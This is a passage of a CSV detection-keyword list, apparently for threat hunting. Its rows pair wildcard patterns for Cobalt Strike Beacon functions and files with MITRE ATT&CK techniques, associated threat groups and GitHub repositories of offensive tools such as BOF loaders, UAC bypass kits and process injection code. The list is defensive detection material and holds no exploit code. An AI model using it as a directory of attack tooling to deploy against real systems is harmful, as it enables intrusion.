T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_command_detail*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_command_detail*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_commands*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_endpoint*c2Get*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*beacon_endpoint*c2Post*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*beacon_execute_job*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_exploit_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*beacon_funcs.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.h*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.x64.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*beacon_funcs.x86.*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 